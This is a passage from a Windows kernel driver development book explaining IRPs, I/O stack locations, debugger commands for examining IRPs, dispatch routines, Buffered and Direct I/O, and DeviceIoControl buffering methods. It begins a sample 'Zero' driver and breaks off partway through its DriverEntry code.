layers completes the request, the driver’s completion routine will be called.
• Start some asynchronous IRP handling - the driver may want to handle the request, but if the request
is lengthy (typical of a hardware driver, but also could be the case for a software driver), the driver
may mark the IRP as pending by calling IoMarkIrpPending and return a STATUS_PENDING
from its dispatch routine. Eventually, it will have to complete the IRP.
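The first option (pass the request down unchanged) typically boils down to two calls. A sketch, assuming the driver saved the lower device object returned by IoAttachDeviceToDeviceStack in its device extension (MyDeviceExtension and LowerDeviceObject are illustrative names):

```cpp
NTSTATUS PassThrough(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    auto ext = (MyDeviceExtension*)DeviceObject->DeviceExtension;
    // the next layer sees the same I/O stack location as this one
    IoSkipCurrentIrpStackLocation(Irp);
    return IoCallDriver(ext->LowerDeviceObject, Irp);
}
```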
Once some layer calls IoCompleteRequest, the IRP turns around and starts “bubbling up” towards
the originator of the IRP (typically one of the I/O System Managers). If completion routines have been
registered, they will be invoked in reverse order of registration.
In most drivers in this book, layering will not be considered, since the driver is most likely the single
device in its devnode. The driver will handle the request then and there or handle it asynchronously; it
will not pass it down, as there is no device underneath.
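For the common "handle it then and there" case, completing an IRP is a short sketch like the following (the status and information values are illustrative):

```cpp
// Sketch: complete an IRP in-place with success and no bytes transferred.
NTSTATUS CompleteNow(PIRP Irp) {
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;   // e.g. bytes transferred
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}
```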
We’ll discuss other aspects of IRP handling in filter drivers, including completion routines, in chapter 13.
IRP and I/O Stack Location
Figure 7-5 shows some of the important fields in an IRP.
Figure 7-5: Important fields of the IRP structure
Here is a quick rundown of these fields:
• IoStatus - contains the Status (NTSTATUS) of the IRP and an Information field. The
Information field is polymorphic, typed as ULONG_PTR (a 32- or 64-bit integer), but its
meaning depends on the type of IRP. For example, for Read and Write IRPs, its meaning is the
number of bytes transferred in the operation.
• UserBuffer - contains the raw buffer pointer to the user’s buffer for relevant IRPs. Read and
Write IRPs, for instance, store the user’s buffer pointer in this field. In DeviceIoControl IRPs,
this points to the output buffer provided in the request.
• UserEvent - this is a pointer to an event object (KEVENT) that was provided by a client if the
call is asynchronous and such an event was supplied. From user mode, this event can be provided
(with a HANDLE) in the OVERLAPPED structure that is mandatory for invoking I/O operations
asynchronously.
• AssociatedIrp - this union holds three members, only one (at most) of which is valid:
* SystemBuffer - the most often used member. This points to a system-allocated non-paged pool buffer
used for Buffered I/O operations. See the section “Buffered I/O” later in this chapter for the details.
* MasterIrp - a pointer to a “master” IRP, if this IRP is an associated IRP. This idea is supported by the
I/O manager, where one IRP is a “master” that may have several “associated” IRPs. Once all the associated
IRPs complete, the master IRP is completed automatically. MasterIrp is valid for an associated IRP - it
points to the master IRP.
* IrpCount - for the master IRP itself, this field indicates the number of IRPs associated with
this master IRP.
Usage of master and associated IRPs is pretty rare. We will not be using this mechanism in this book.
• Cancel Routine - a pointer to a cancel routine that is invoked (if not NULL) if the driver is asked
to cancel the IRP, such as with the user-mode functions CancelIo and CancelIoEx. Software
drivers rarely need cancellation routines, so we will not be using those in most examples.
• MdlAddress - points to an optional Memory Descriptor List (MDL). An MDL is a kernel data
structure that knows how to describe a buffer in RAM. MdlAddress is used primarily with Direct
I/O (see the section “Direct I/O” later in this chapter).
Every IRP is accompanied by one or more IO_STACK_LOCATIONs. Figure 7-6 shows the important fields
in an IO_STACK_LOCATION.
Figure 7-6: Important fields of the IO_STACK_LOCATION structure
Here’s a rundown of the fields shown in figure 7-6:
• MajorFunction - this is the major function of the IRP (IRP_MJ_CREATE, IRP_MJ_READ, etc.).
This field is sometimes useful if the driver points more than one major function code to the same
handling routine. In that routine, the driver may want to distinguish between the major function
codes using this field.
• MinorFunction - some IRP types have minor functions. These are IRP_MJ_PNP, IRP_MJ_POWER
and IRP_MJ_SYSTEM_CONTROL (WMI). Typical code for these handlers has a switch statement
based on the MinorFunction. We will not be using these types of IRPs in this book, except in the
case of filter drivers for hardware-based devices, which we’ll examine in some detail in chapter 13.
• FileObject - the FILE_OBJECT associated with this IRP. Not needed in most cases, but is
available for dispatch routines that need it.
• DeviceObject - the device object associated with this IRP. Dispatch routines receive a pointer to
this, so typically accessing this field is not required.
• CompletionRoutine - the completion routine that is set for the previous (upper) layer (set with
IoSetCompletionRoutine), if any.
• Context - the argument to pass to the completion routine (if any).
• Parameters - this monster union contains multiple structures, each valid for a particular operation.
For example, in a Read (IRP_MJ_READ) operation, the Parameters.Read structure field should
be used to get more information about the Read operation.
The current I/O stack location obtained with IoGetCurrentIrpStackLocation hosts most of the
parameters of the request in the Parameters union. It’s up to the driver to access the correct structure,
as we’ve already seen in chapter 4 and will see again in this and subsequent chapters.
Viewing IRP Information
While debugging or analyzing kernel dumps, a couple of commands may be useful for searching or
examining IRPs.
The !irpfind command can be used to find IRPs - either all IRPs, or IRPs that meet certain criteria. Using
!irpfind without any arguments searches the non-paged pool(s) for all IRPs. Check out the debugger
documentation on how to specify specific criteria to limit the search. Here’s an example of some output
when searching for all IRPs:
lkd> !irpfind
Unable to get offset of nt!_MI_VISIBLE_STATE.SpecialPool
Unable to get value of nt!_MI_VISIBLE_STATE.SessionSpecialPool
Scanning large pool allocation table for tag 0x3f707249 (Irp?) (ffffbf0a87610000 : ffffbf0a87910000)

  Irp              [ Thread ]         irpStack: (Mj,Mn)  DevObj           [Driver]           MDL Process
ffffbf0aa795ca30 [ffffbf0a7fcde080] irpStack: ( c, 2)  ffffbf0a74d20050 [ \FileSystem\Ntfs]
ffffbf0a9a8ef010 [ffffbf0a7fcde080] irpStack: ( c, 2)  ffffbf0a74d20050 [ \FileSystem\Ntfs]
ffffbf0a8e68ea20 [ffffbf0a7fcde080] irpStack: ( c, 2)  ffffbf0a74d20050 [ \FileSystem\Ntfs]
ffffbf0a90deb710 [ffffbf0a808a1080] irpStack: ( c, 2)  ffffbf0a74d20050 [ \FileSystem\Ntfs]
ffffbf0a99d1da90 [0000000000000000] Irp is complete (CurrentLocation 10 > StackCount 9)
ffffbf0a74cec940 [0000000000000000] Irp is complete (CurrentLocation 8 > StackCount 7)
ffffbf0aa0640a20 [ffffbf0a7fcde080] irpStack: ( c, 2)  ffffbf0a74d20050 [ \FileSystem\Ntfs]
ffffbf0a89acf4e0 [ffffbf0a7fcde080] irpStack: ( c, 2)  ffffbf0a74d20050 [ \FileSystem\Ntfs]
ffffbf0a89acfa50 [ffffbf0a7fcde080] irpStack: ( c, 2)  ffffbf0a74d20050 [ \FileSystem\Ntfs]
(truncated)
Faced with a specific IRP, the command !irp examines the IRP, providing a nice overview of its data. As
always, the dt command can be used with the nt!_IRP type to look at the entire IRP structure. Here’s
an example of one IRP viewed with !irp:
kd> !irp ffffbf0a8bbada20
Irp is active with 13 stacks 12 is current (= 0xffffbf0a8bbade08)
 No Mdl: No System Buffer: Thread ffffbf0a7fcde080:  Irp stack trace.
     cmd  flg cl Device   File     Completion-Context
 [N/A(0), N/A(0)]
            0  0 00000000 00000000 00000000-00000000
            Args: 00000000 00000000 00000000 00000000
 [N/A(0), N/A(0)]
            0  0 00000000 00000000 00000000-00000000
            Args: 00000000 00000000 00000000 00000000

(truncated)

 [N/A(0), N/A(0)]
            0  0 00000000 00000000 00000000-00000000
            Args: 00000000 00000000 00000000 00000000
>[IRP_MJ_DIRECTORY_CONTROL(c), N/A(2)]
            0 e1 ffffbf0a74d20050 ffffbf0a7f52f790 fffff8015c0b50a0-ffffbf0a91d99010 Success Error Cancel pending
           \FileSystem\Ntfs
            Args: 00004000 00000051 00000000 00000000
 [IRP_MJ_DIRECTORY_CONTROL(c), N/A(2)]
            0  0 ffffbf0a60e83dc0 ffffbf0a7f52f790 00000000-00000000
           \FileSystem\FltMgr
            Args: 00004000 00000051 00000000 00000000
The !irp command lists the I/O stack locations and the information stored in them. The current I/O
stack location is marked with a > symbol (see the IRP_MJ_DIRECTORY_CONTROL line above).
The details for each IO_STACK_LOCATION are as follows (in order):
• first line:
– Major function code (e.g. IRP_MJ_DEVICE_CONTROL).
– Minor function code.
• second line:
– Flags (mostly unimportant)
– Control flags
– Device object pointer
– File object pointer
– Completion routine (if any)
– Completion context (for the completion routine)
– Success, Error, Cancel indicate the IRP completion cases where the completion routine would
be invoked
– “pending” if the IRP was marked as pending (SL_PENDING_RETURNED flag is set in the
Control flags)
• Driver name for that layer
• “Args” line:
– The value of Parameters.Others.Argument1 in the I/O stack location. Essentially the
first pointer-size member in the Parameters union.
– The value of Parameters.Others.Argument2 in the I/O stack location (the second
pointer-size member in the Parameters union)
– Device I/O control code (if IRP_MJ_DEVICE_CONTROL or IRP_MJ_INTERNAL_DEVICE_-
CONTROL). It’s shown as a DML link that invokes the !ioctldecode command to decode the
control code (more on device I/O control codes later in this chapter). For other major function
codes, shows the third pointer-size member (Parameters.Others.Argument3)
– The forth pointer-size member (Parameters.Others.Argument4)
The !irp command accepts an optional details argument. The default is zero, which provides the output
described above (considered a summary). Specifying 1 provides additional information in expanded form.
Here is an example for an IRP targeted towards the console driver (you can locate those easily by looking
for cmd.exe processes):
lkd> !irp ffffdb899e82a6f0 1
Irp is active with 2 stacks 1 is current (= 0xffffdb899e82a7c0)
 No Mdl: System buffer=ffffdb89c1c84ac0: Thread ffffdb89b6efa080:  Irp stack trace.
Flags = 00060030
ThreadListEntry.Flink = ffffdb89b6efa530
ThreadListEntry.Blink = ffffdb89b6efa530
IoStatus.Status = 00000000
IoStatus.Information = 00000000
RequestorMode = 00000001
Cancel = 00
CancelIrql = 0
ApcEnvironment = 00
UserIosb = 73d598f420
UserEvent = 00000000
Overlay.AsynchronousParameters.UserApcRoutine = 00000000
Overlay.AsynchronousParameters.UserApcContext = 00000000
Overlay.AllocationSize = 00000000 - 00000000
CancelRoutine = fffff8026f481730
UserBuffer = 00000000
&Tail.Overlay.DeviceQueueEntry = ffffdb899e82a768
Tail.Overlay.Thread = ffffdb89b6efa080
Tail.Overlay.AuxiliaryBuffer = 00000000
Tail.Overlay.ListEntry.Flink = ffff8006d16437b8
Tail.Overlay.ListEntry.Blink = ffff8006d16437b8
Tail.Overlay.CurrentStackLocation = ffffdb899e82a7c0
Tail.Overlay.OriginalFileObject = ffffdb89c1c0a240
Tail.Apc = 8b8b7240
Tail.CompletionKey = 15f8b8b7240
     cmd  flg cl Device   File     Completion-Context
>[N/A(f), N/A(7)]
            0  1 00000000 00000000 00000000-00000000
       pending
            Args: ffff8006d1643790 15f8d92c340 0xa0e666b0 ffffdb899e7a53c0
 [IRP_MJ_DEVICE_CONTROL(e), N/A(0)]
            5  0 ffffdb89846f9e10 ffffdb89c1c0a240 00000000-00000000
           \Driver\condrv
            Args: 00000000 00000060 0x500016 00000000
Additionally, specifying detail value of 4 shows Driver Verifier information related to the IRP (if the driver
handling this IRP is under the verifier’s microscope). Driver Verifier will be discussed in chapter 13.
Dispatch Routines
In chapter 4, we have seen an important aspect of DriverEntry - setting up dispatch routines. These
are the functions connected with major function codes. The MajorFunction field in DRIVER_OBJECT
is the array of function pointers indexed by the major function code.
All dispatch routines have the same prototype, repeated here for convenience using the DRIVER_DISPATCH
typedef from the WDK (somewhat simplified for clarity):
typedef NTSTATUS DRIVER_DISPATCH (
    _In_    PDEVICE_OBJECT DeviceObject,
    _Inout_ PIRP Irp);
The relevant dispatch routine (based on the major function code) is the first routine in a driver that sees
the request. Normally, it’s called in the requesting thread context, i.e. the thread that called the relevant
API (e.g. ReadFile) in IRQL PASSIVE_LEVEL (0). However, it’s possible that a filter driver sitting on
top of this device sent the request down in a different context - it may be some other thread unrelated
to the original requestor and even in higher IRQL, such as DISPATCH_LEVEL (2). Robust drivers need to
be ready to deal with this kind of situation, even though for software drivers this “inconvenient” context
is rare. We’ll discuss the way to properly deal with this situation in the section “Accessing User Buffers”,
later in this chapter.
The first thing a typical dispatch routine does is check for errors. For example, read and write operations
contain buffers - do these buffers have appropriate size? For DeviceIoControl, there is a control code
in addition to potentially two buffers. The driver needs to make sure the control code is something it
recognizes. If any error is identified, the IRP is typically completed immediately with an appropriate status.
If all checks pass, the driver can proceed to perform the requested operation.
Here is the list of the most common dispatch routines for a software driver:
• IRP_MJ_CREATE - corresponds to a CreateFile call from user mode or ZwCreateFile in kernel
mode. This major function is essentially mandatory, otherwise no client will be able to open a handle
to a device controlled by this driver. Most drivers just complete the IRP with a success status.
• IRP_MJ_CLOSE - the opposite of IRP_MJ_CREATE. Called by CloseHandle from user mode or
ZwClose from kernel mode when the last handle to the file object is about to be closed. Most drivers
just complete the request successfully, but if something meaningful was done in IRP_MJ_CREATE,
this is where it should be undone.
• IRP_MJ_READ - corresponds to a read operation, typically invoked from user mode by ReadFile
or kernel mode with ZwReadFile.
• IRP_MJ_WRITE - corresponds to a write operation, typically invoked from user mode by
WriteFile or kernel mode with ZwWriteFile.
• IRP_MJ_DEVICE_CONTROL - corresponds to the DeviceIoControl call from user mode or
ZwDeviceIoControlFile from kernel mode (there are other APIs in the kernel that can generate
IRP_MJ_DEVICE_CONTROL IRPs).
• IRP_MJ_INTERNAL_DEVICE_CONTROL - similar to IRP_MJ_DEVICE_CONTROL, but only
available to kernel callers.
Completing a Request
Once a driver decides to handle an IRP (meaning it's not passing it down to another driver), it must eventually
complete it. Otherwise, we have a leak on our hands - the requesting thread cannot really terminate and,
by extension, its containing process will linger on as well, resulting in a "zombie process".
Completing a request means calling IoCompleteRequest after setting the request status and extra
information. If the completion is done in the dispatch routine itself (a common case for software drivers),
the routine must return the same status that was placed in the IRP.
The following code snippet shows how to complete a request in a dispatch routine:
NTSTATUS MyDispatchRoutine(PDEVICE_OBJECT, PIRP Irp) {
    //...
    Irp->IoStatus.Status = STATUS_XXX;
    Irp->IoStatus.Information = bytes;    // depends on request type
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_XXX;
}
Since the dispatch routine must return the same status as was placed in the IRP, it’s tempting
to write the last statement like so: return Irp->IoStatus.Status; This, however, will
likely result in a system crash. Can you guess why?
After the IRP is completed, touching any of its members is a bad idea. The IRP has probably
already been freed and you’re touching deallocated memory. It can actually be worse, since
another IRP may have been allocated in its place (this is common), and so the code may return
the status of some random IRP.
The Information field should be zero in case of an error (a failure status). Its exact meaning for a
successful operation depends on the type of IRP.
The IoCompleteRequest API accepts two arguments: the IRP itself and an optional value to temporarily
boost the original thread’s priority (the thread that initiated the request in the first place). In most cases,
for software drivers, the thread in question is the executing thread, so a thread boost is inappropriate. The
value IO_NO_INCREMENT is defined as zero, so no increment in the above code snippet.
However, the driver may choose to give the thread a boost, regardless of whether it's the calling thread
or not. In this case, the thread's priority jumps by the given boost, and it's allowed to execute one
quantum with the new priority before the priority decreases by one; it can then get another quantum
with the reduced priority, and so on, until the priority returns to its original level. Figure 7-7 illustrates this
scenario.
Figure 7-7: Thread priority boost and decay
The thread's priority after the boost can never go above 15; if the boost would push it higher, the
priority is set to 15. If the original thread's priority is already above 15, boosting has no effect.
Accessing User Buffers
A given dispatch routine is the first to see the IRP. Some dispatch routines, mainly IRP_MJ_READ,
IRP_MJ_WRITE and IRP_MJ_DEVICE_CONTROL, accept buffers provided by a client - in most cases from user
mode. Typically, a dispatch routine is called at IRQL 0 and in the requesting thread context, which means
the buffer pointers provided by user mode are trivially accessible: the IRQL is 0, so page faults are handled
normally, and the thread is the requestor, so the pointers are valid in this process context.
However, there could be issues. As we’ve seen in chapter 6, even in this convenient context (requesting
thread and IRQL 0), it’s possible for another thread in the client’s process to free the passed-in buffer(s),
before the driver gets a chance to examine them, and so cause an access violation. The solution we’ve used
in chapter 6 is to use a __try / __except block to handle any access violation by returning failure to the
client.
In some cases, even that is not enough. For example, if we have some code running at IRQL 2 (such as a
DPC running as a result of timer expiration), we cannot safely access the user’s buffers in this context. In
general, there are two potential issues here:
• IRQL of the calling CPU is 2 (or higher), meaning no page fault handling can occur.
• The thread calling the driver may be some arbitrary thread, and not the original requestor. This
means that the buffer pointer(s) provided are meaningless, since the wrong process address space is
accessible.
Using exception handling in such a case will not work as expected, because we’ll be accessing some
memory location that is essentially invalid in this random process context. Even if the access succeeds
(because that memory happens to be allocated in this random process and is resident in RAM), you’ll be
accessing random memory, and certainly not the original buffer provided to the client.
All this means that there must be some good way to access the original user's buffer in such an inconvenient
context. In fact, the I/O manager provides two such ways, called Buffered I/O and Direct I/O. In the next
two sections, we'll see what each of these schemes means and how to use it.
Some data structures are always safe to access, since they are allocated from non-paged
pool (and are in system space). Common examples are device objects (created with
IoCreateDevice) and IRPs.
Buffered I/O
Buffered I/O is the simpler of the two ways. To get support for Buffered I/O for read and write operations,
a flag must be set on the device object like so:
DeviceObject->Flags |= DO_BUFFERED_IO;    // DO = Device Object
DeviceObject is the pointer resulting from a previous call to IoCreateDevice (or
IoCreateDeviceSecure).
For IRP_MJ_DEVICE_CONTROL buffers, see the section “User Buffers for IRP_MJ_DEVICE_CONTROL”
later in this chapter.
Here are the steps taken by the I/O Manager and the driver when a read or write request arrives:
1. The I/O Manager allocates a buffer from non-paged pool with the same size as the user’s buffer. It
stores the pointer to this new buffer in the AssociatedIrp->SystemBuffer member of the IRP.
(The buffer size can be found in the current I/O stack location’s Parameters.Read.Length or
Parameters.Write.Length.)
2. For a write request, the I/O Manager copies the user’s buffer to the system buffer.
3. Only now the driver’s dispatch routine is called. The driver can use the system buffer pointer directly
without any checks, because the buffer is in system space (its address is absolute - the same from
any process context), and in any IRQL, because the buffer is allocated from non-paged pool, so it
cannot be paged out.
4. Once the driver completes the IRP (IoCompleteRequest), the I/O manager (for read requests)
copies the system buffer back to the user’s buffer (the size of the copy is determined by the
IoStatus.Information field in the IRP set by the driver).
5. Finally, the I/O Manager frees the system buffer.
You may be wondering how the I/O Manager copies the system buffer back to the original
user's buffer from IoCompleteRequest, given that this function can be called from any thread,
at IRQL <= 2. The way it's done is by queuing a special kernel APC to the thread that requested
the operation. Once this thread is scheduled for execution, the first thing it does is run this APC,
which performs the actual copying. The requesting thread is obviously in the correct process
context, and the IRQL is 1, so page faults can be handled normally.
Figures 7-8a to 7-8e illustrate the steps taken with Buffered I/O.
Figure 7-8a: Buffered I/O: initial state
Figure 7-8b: Buffered I/O: system buffer allocated
Figure 7-8c: Buffered I/O: driver accesses system buffer
Figure 7-8d: Buffered I/O: on IRP completion, I/O manager copies buffer back (for read)
Figure 7-8e: Buffered I/O: final state - I/O manager frees system buffer
Buffered I/O has the following characteristics:
• Easy to use - just specify the flag in the device object, and everything else is taken care of by the
I/O Manager.
• It always involves a copy - which means it’s best used for small buffers (typically up to one page).
Large buffers may be expensive to copy. In this case, the other option, Direct I/O, should be used
instead.
Direct I/O
The purpose of Direct I/O is to allow access to a user's buffer at any IRQL and from any thread, but
without any copying.
For read and write requests, selecting Direct I/O is done with a different flag of the device object:
DeviceObject->Flags |= DO_DIRECT_IO;
As with Buffered I/O, this selection only affects read and write requests. For DeviceIoControl see the
next section.
Here are the steps involved in handling Direct I/O:
1. The I/O Manager first makes sure the user’s buffer is valid and then pages it into physical memory
(if it wasn’t already there).
2. It then locks the buffer in memory, so it cannot be paged out until further notice. This solves one
of the issues with buffer access - page faults cannot happen, so accessing the buffer in any IRQL is
safe.
3. The I/O Manager builds a Memory Descriptor List (MDL), a data structure that describes a buffer in
physical memory. The address of this data structure is stored in the MdlAddress field of the IRP.
4. At this point, the driver gets the call to its dispatch routine. The user’s buffer, although locked in
RAM, cannot be accessed from an arbitrary thread just yet. When the driver requires access to the
buffer, it must call a function that maps the same user buffer to a system address, which by definition
is valid in any process context. So essentially, we get two mappings to the same memory buffer.
One is from the original address (valid only in the context of the requestor process) and the other
in system space, which is always valid. The API to call is MmGetSystemAddressForMdlSafe,
passing the MDL built by the I/O Manager. The return value is the system address.
5. Once the driver completes the request, the I/O Manager removes the second mapping (to system
space), frees the MDL, and unlocks the user’s buffer, so it can be paged normally just like any other
user-mode memory.
The MDL is actually a list of MDL structures, each one describing a piece of the buffer that is contiguous
in physical memory. Remember that a buffer that is contiguous in virtual memory is not necessarily
contiguous in physical memory (the smallest piece is a page). In most cases, we don't need to care
about this detail. One case where this matters is Direct Memory Access (DMA) operations. Fortunately,
this is in the realm of hardware-based drivers.
Figures 7-9a to 7-9f illustrate the steps taken with Direct I/O.
Figure 7-9a: Direct I/O: initial state
Figure 7-9b: Direct I/O: I/O manager faults buffer’s pages to RAM and locks them
Figure 7-9c: Direct I/O: the MDL describing the buffer is stored in the IRP
Figure 7-9d: Direct I/O: the driver double-maps the buffer to a system address
Figure 7-9e: Direct I/O: the driver accesses the buffer using the system address
Figure 7-9f: Direct I/O: when the IRP is completed, the I/O manager frees the mapping, the MDL and unlocks the buffer
Notice there is no copying at all. The driver just reads/writes to the user’s buffer directly, using the system
address.
Locking the user’s buffer is done with the MmProbeAndLockPages API, fully documented
in the WDK. Unlocking is done with MmUnlockPages, also documented. This means a driver
can use these routines outside the narrow context of Direct I/O.
Calling MmGetSystemAddressForMdlSafe can be done multiple times. The MDL stores a
flag indicating whether the system mapping has already been done. If so, it just returns the
existing pointer.
Here is the prototype of MmGetSystemAddressForMdlSafe:
PVOID MmGetSystemAddressForMdlSafe (
    _Inout_ PMDL Mdl,
    _In_    ULONG Priority);
The function is implemented inline within the wdm.h header by calling the more generic
MmMapLockedPagesSpecifyCache function:
PVOID MmGetSystemAddressForMdlSafe(PMDL Mdl, ULONG Priority) {
if (Mdl->MdlFlags & (MDL_MAPPED_TO_SYSTEM_VA|MDL_SOURCE_IS_NONPAGED_POOL)) {
return Mdl->MappedSystemVa;
} else {
return MmMapLockedPagesSpecifyCache(Mdl, KernelMode, MmCached,
NULL, FALSE, Priority);
}
}
MmGetSystemAddressForMdlSafe accepts the MDL and a page priority (MM_PAGE_PRIORITY
enumeration). Most drivers specify NormalPagePriority, but there are also LowPagePriority and
HighPagePriority. This priority gives a hint to the system of the importance of the mapping in low
memory conditions. Check the WDK documentation for more information.
If MmGetSystemAddressForMdlSafe fails, it returns NULL. This means the system is out of system
page tables or very low on system page tables (depends on the priority argument above). This should be a
rare occurrence, but still can happen in low memory conditions. A driver must check for this; if NULL is
returned, the driver should complete the IRP with the status STATUS_INSUFFICIENT_RESOURCES.
There is a similar function, called MmGetSystemAddressForMdl, which if it fails, crashes
the system. Do not use this function.
You may be wondering why the I/O manager doesn't call MmGetSystemAddressForMdlSafe
automatically, which would be simple enough to do. This is an optimization: if the driver fails the
request early because of some error, it never needs to call this function, and the mapping doesn't
have to occur at all.
Drivers that set neither DO_BUFFERED_IO nor DO_DIRECT_IO in the device object flags implicitly use
Neither I/O, which simply means the driver doesn't get any special help from the I/O manager, and it's
up to the driver to deal with the user's buffer.
User Buffers for IRP_MJ_DEVICE_CONTROL
The last two sections discussed Buffered I/O and Direct I/O as they pertain to read and write requests. For
IRP_MJ_DEVICE_CONTROL (and IRP_MJ_INTERNAL_DEVICE_CONTROL), the buffering method is
selected on a per-control-code basis. Here is the prototype of the user-mode API DeviceIoControl (it's
similar to the kernel function ZwDeviceIoControlFile):
BOOL DeviceIoControl(
    HANDLE hDevice,              // handle to device or file
    DWORD dwIoControlCode,       // IOCTL code (see <winioctl.h>)
    PVOID lpInBuffer,            // input buffer
    DWORD nInBufferSize,         // size of input buffer
    PVOID lpOutBuffer,           // output buffer
    DWORD nOutBufferSize,        // size of output buffer
    PDWORD lpdwBytesReturned,    // # of bytes actually returned
    LPOVERLAPPED lpOverlapped);  // for async. operation
There are three important parameters here: the I/O control code, and two optional buffers designated
"input" and "output". As it turns out, the way these buffers are accessed depends on the control code,
which is very convenient, because different requests may have different requirements related to accessing
the user's buffer(s).
The control code defined by a driver must be built with the CTL_CODE macro, defined in both the WDK
and user-mode headers like so:
#define CTL_CODE( DeviceType, Function, Method, Access ) ( \
((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method))
The first parameter, DeviceType, can be one of a set of constants defined by Microsoft for various known
device types (such as FILE_DEVICE_DISK and FILE_DEVICE_KEYBOARD). For custom devices (like the
ones we are writing), it can be any value, but the documentation states that the minimum value for
custom codes should be 0x8000.
The second parameter, Function, is a running index that must be different between multiple control
codes defined by the same driver. If all other components of the macro are the same (which is possible), at
least the Function would be a differentiating factor. Similarly to the device type, the official documentation
states that custom codes should use values starting from 0x800.
The third parameter (Method) is the key to selecting the buffering method for accessing the input and
output buffers provided with DeviceIoControl. Here are the options:
• METHOD_NEITHER - this value means no help is required of the I/O manager, so the driver is left
dealing with the buffers on its own. This could be useful, for instance, if the particular code does
not require any buffer - the control code itself is all the information needed - it’s best to let the I/O
manager know that it does not need to do any additional work.
– In this case, the pointer to the user's input buffer is stored in the current I/O stack location's
Parameters.DeviceIoControl.Type3InputBuffer field, and the output buffer pointer is
stored in the IRP's UserBuffer field.
• METHOD_BUFFERED - this value indicates Buffered I/O for both the input and output buffer. When
the request starts, the I/O manager allocates the system buffer from non-paged pool with the
size that is the maximum of the lengths of the input and output buffers. It then copies the input
buffer to the system buffer. Only now the IRP_MJ_DEVICE_CONTROL dispatch routine is invoked.
When the request completes, the I/O manager copies the number of bytes indicated with the
IoStatus.Information field in the IRP to the user’s output buffer.
– The system buffer pointer is at the usual location: AssociatedIrp.SystemBuffer inside
the IRP structure.
• METHOD_IN_DIRECT and METHOD_OUT_DIRECT - contrary to intuition, both of these values mean
the same thing as far as buffering methods are concerned: the input buffer uses Buffered I/O and the
output buffer uses Direct I/O. The only difference between these two values is whether the output
buffer can be read (METHOD_IN_DIRECT) or written (METHOD_OUT_DIRECT).
The last bullet indicates that the output buffer can also be treated as input by using
METHOD_IN_DIRECT.
Table 7-1 summarizes these buffering methods.
Table 7-1: Buffering method based on control code Method parameter

Method               Input buffer    Output buffer
METHOD_NEITHER       Neither         Neither
METHOD_BUFFERED      Buffered        Buffered
METHOD_IN_DIRECT     Buffered        Direct
METHOD_OUT_DIRECT    Buffered        Direct
Finally, the Access parameter to the macro indicates the direction of data flow. FILE_WRITE_ACCESS
means from the client to the driver, FILE_READ_ACCESS means the opposite, and FILE_ANY_ACCESS
means bi-directional access (both the input and output buffers are used). You should always use
FILE_ANY_ACCESS. Besides simplifying the control code building, it guarantees that if, once the driver
is already deployed, you later want to use the other buffer as well, you won't need to change the Access
parameter, and so won't disturb existing clients that would not know about the control code change.
If a control code is built with METHOD_NEITHER, the I/O manager does nothing to help with
accessing the buffer(s). The values for the input and output buffer pointers provided by the
client are copied as-is to the IRP. No checking is done by the I/O manager to make sure these
pointers point to valid memory. A driver should not use these pointers as memory pointers, but
they can be used as two arbitrary values propagating to the driver that may mean something.
Putting it All Together: The Zero Driver
In this section, we’ll use what we’ve learned in this (and earlier) chapter and build a driver and a client
application. The driver is named Zero and has the following characteristics:
• For read requests, it zeros out the provided buffer.
• For write requests, it just consumes the provided buffer, similar to a classic null device.
The driver will use Direct I/O so as not to incur the overhead of copies, as the buffers provided by the
client can potentially be very large.
We'll start the project by creating an "Empty WDM Project" in Visual Studio and name it Zero. Then
we'll delete the created INF file, resulting in an empty project, just like in previous examples.
Using a Precompiled Header
One technique we can use that is not specific to driver development, but is generally useful, is a
precompiled header. Precompiled headers are a Visual Studio feature that helps speed up compilation.
The precompiled header is a header file that has #include statements for headers that rarely
change, such as ntddk.h for drivers. It is compiled once, stored in an internal
binary format, and used in subsequent compilations, which become considerably faster.
Many user mode projects created by Visual Studio already use precompiled headers. Kernel-
mode projects provided by the WDK templates currently don’t use precompiled headers. Since
we’re starting with an empty project, we have to set up precompiled headers manually anyway.
Follow these steps to create and use a precompiled header:
• Add a new header file to the project and call it pch.h. This file will serve as the precompiled header.
Add all rarely-changing #includes here:
// pch.h
#pragma once
#include <ntddk.h>
• Add a source file named pch.cpp and put a single #include in it: the precompiled header itself:
#include "pch.h"
• Now comes the tricky part: letting the compiler know that pch.h is the precompiled header and
pch.cpp is the one creating it. Open project properties, select All Configurations and All Platforms
so you won't need to configure every configuration/platform separately, navigate to C/C++ /
Precompiled Headers, and set Precompiled Header to Use and the file name to "pch.h" (see figure
7-10). Click OK to close the dialog box.
Figure 7-10: Setting precompiled header for the project
• The pch.cpp file should be set as the creator of the precompiled header. Right-click this file in Solution
Explorer, and select Properties. Navigate to C/C++ / Precompiled Headers and set Precompiled Header
to Create (see figure 7-11). Click OK to accept the setting.
Figure 7-11: Setting precompiled header for pch.cpp
From this point on, every C/CPP file in the project must #include "pch.h" as the first thing in the file.
Without this include, the project will not compile.
Make sure there is nothing before this #include "pch.h" in a source file. Anything before
this line does not get compiled at all!
The DriverEntry Routine
The DriverEntry routine for the Zero driver is very similar to the one we created for the driver in chapter
4. However, in chapter 4’s driver, the code in DriverEntry had to undo any operation already performed
in case of a later error. We had just two operations that could be undone: creation of the device object and
creation of the symbolic link. The Zero driver is similar, but we’ll write more robust and less error-prone
code to handle errors during initialization. Let’s start with the basics of setting up an unload routine and
the dispatch routines:
#define DRIVER_PREFIX "Zero: "
// DriverEntry
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
UNREFERENCED_PARAMETER(RegistryPath);
DriverObject->DriverUnload = ZeroUnload;
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] = ZeroCreateClose;
DriverObject->MajorFunction[IRP_MJ_READ] = ZeroRead;
DriverObject->MajorFunction[IRP_MJ_WRITE] = ZeroWrite;
Now we need to create the device object and symbolic link, and handle errors in a more general and robust
way. The trick we’ll use is a do / while(false) block - not really a loop, but a scope that can be
exited with a simple break statement in case something goes wrong:
UNICODE_STRING devName = RTL_CONSTANT_STRING(L"\\Device\\Zero");
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\Zero");
PDEVICE_OBJECT DeviceObject = nullptr;
